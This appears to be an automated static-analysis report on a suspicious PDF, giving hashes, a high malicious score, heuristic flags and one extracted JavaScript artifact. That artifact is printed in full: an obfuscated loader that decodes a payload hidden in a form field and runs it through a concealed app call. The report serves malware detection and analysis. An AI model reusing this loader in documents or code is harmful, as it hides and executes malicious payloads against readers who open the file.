PDF static analysis report

Static analysis result for SHA-256 f42bf289415aa119…

SUSPICIOUS

PDF

20.1 KB Created: 2012-11-08 19:09:18 +03:00 Authoring application: Adobe Acrobat 7.0 (via Adobe Acrobat 7.0 Image Conversion Plug-in) First seen: 2026-05-08
MD5: 8222d23e8d07cc9bce8e0fdb2921e1c7 SHA-1: eef3c7b00ef75c3a9f9f210a218fafd29b53d5b6 SHA-256: f42bf289415aa1195b73dcd86a7cd62bca34af8ab966243bc60a68b3f655c8f3
48 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9977

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0106_000.js pdf-javascript-stream PDF /JS object 106 at offset 0x4CFB 1292 bytes
SHA-256: 9c224de20cfb4d64ac142e0732375db93a9c2405cfa8161eed1601ac21996c0f
Preview script
First 1,000 lines of the extracted script
var hjgklsfoire34o = "fghijk";
var reg34e34rfrew = ':ABCD'+'EFG';
var ewr32r23wre = 'QRS'+'TU'+'VWXYZ{'+'}';
var rere3ew2r23w = "()[]^"+"abc"+"de";
var ewrwr23wrewf = 'pqrstuvw';
var ert4t3ret = '45678';
var werr3r2wr3er = '"=<>&\\';
function xbdg54eg(rg34ge){
var gargeggr="";
var r3gferg = 36;
for (var i = 0;i<rg34ge.length-(15-14);i++)
{var cxnerg4feeswf = rg34ge[i];
var reg4ewtfews=xczr4etw4e.indexOf(cxnerg4feeswf)-r3gferg;
var rwghoeregregr= reg4ewtfews+xczr4etw4e.length;
if (reg4ewtfews<(10-10)){reg4ewtfews=rwghoeregregr}
gargeggr += xczr4etw4e.charAt(reg4ewtfews)}
return gargeggr;}
var dsfvcwt4es = '9/!%+-*.,;';
var esdrzw4ry = hjgklsfoire34o+"lmno"+ewrwr23wrewf+'x'+'yz_0123'+ert4t3ret+dsfvcwt4es+werr3r2wr3er;
var nmxcbver4t = ewr32r23wre+' '+rere3ew2r23w+esdrzw4ry;
var xcvzwt4ert4t = reg34e34rfrew +'HIJKLMNOP';
var edrrrt4fw4re = xcvzwt4ert4t+nmxcbver4t;
var xczr4etw4e =edrrrt4fw4re;
var erg4wtgeg=getField("WSWSWS");
var ewfwr34fw4e=erg4wtgeg.value;
var xcvbretyg43e = xbdg54eg(ewfwr34fw4e);
var xbv4tter4t = "hauaiyh9iryh98wyf98awyf89sdayfp89aewyf89wey9wev"+"alrgwrgqr3ewgergvaebgegaehergg";
var dfhja78r278fdsa78tffdfssdf78dasf678as87dasf78d6fs78dfas7d7dt78 = xbv4tter4t.substr(45,4);
app[dfhja78r278fdsa78tffdfssdf78dasf678as87dasf78d6fs78dfas7d7dt78](xcvbretyg43e);